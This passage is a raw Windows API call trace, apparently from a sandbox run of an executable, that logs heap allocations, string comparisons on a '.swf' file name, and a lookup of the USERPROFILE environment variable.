(Locale=0x400, dwCmpFlags=0x1, lpString1="uK1W_b3QKmuHjRF.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0214.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K1W_b3QKmuHjRF.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1W_b3QKmuHjRF.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W_b3QKmuHjRF.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0214.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_b3QKmuHjRF.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b3QKmuHjRF.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3QKmuHjRF.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QKmuHjRF.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0214.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KmuHjRF.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="muHjRF.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0214.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uHjRF.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0214.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HjRF.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jRF.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RF.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0214.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0214.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0214.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0214.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0214.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0214.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0214.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0214.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0214.717] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0214.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0214.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0214.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0214.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0214.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0214.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0214.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0214.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0214.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0214.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0214.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0214.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0214.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0214.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0214.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0214.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0214.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2a) returned 0x2aa63e0 [0214.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0214.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SuK1W_b3QKmuHjRF.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uK1W_b3QKmuHjRF.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K1W_b3QKmuHjRF.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1W_b3QKmuHjRF.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0214.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W_b3QKmuHjRF.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_b3QKmuHjRF.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0214.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b3QKmuHjRF.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0214.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3QKmuHjRF.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0214.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QKmuHjRF.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KmuHjRF.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="muHjRF.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uHjRF.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HjRF.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jRF.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RF.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0214.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa65d8 [0214.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0214.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa65d8 | out: hHeap=0x2af0000) returned 1 [0214.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0214.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0214.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0214.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0214.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0214.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0214.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0214.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0214.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0214.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69700 | out: hHeap=0x2af0000) returned 1 [0214.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0214.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0214.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0214.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0214.719] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0214.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0214.719] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0214.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0214.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0214.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0214.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719b8 [0214.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0214.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0214.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0214.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0214.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0214.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0214.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0214.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0214.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0214.720] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0214.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0214.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0214.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae40 [0214.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0214.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf00 [0214.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0214.720] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0214.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0214.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0214.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0214.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0214.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0214.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0214.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0214.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0214.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0214.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0214.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0214.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0214.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0214.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0214.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0214.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0214.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74d90 [0214.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0214.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0214.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0214.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0214.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0214.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0214.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0214.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b08 [0214.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0214.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0214.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0214.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0214.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0214.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0214.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0214.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0214.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0214.722] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0214.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0214.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0214.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaafa8 [0214.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0214.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0214.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0e0 [0214.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0214.722] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0214.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0214.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0214.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0214.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0214.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0214.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0214.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0214.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0214.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0214.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0214.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0214.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0214.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0214.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0214.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74f30 [0214.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0214.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0214.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0214.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0214.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0214.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd0) returned 0x29f7878 [0214.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74f30 | out: hHeap=0x2af0000) returned 1 [0214.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0214.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0214.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0214.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0214.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a78 [0214.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0214.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0214.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0214.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0214.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719c8 [0214.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0214.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0214.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf48 [0214.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0214.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0214.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0214.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0214.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0214.724] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0214.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0214.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0214.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0214.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0214.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0214.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0214.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0214.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0214.725] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0214.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0214.725] HeapFree (in: 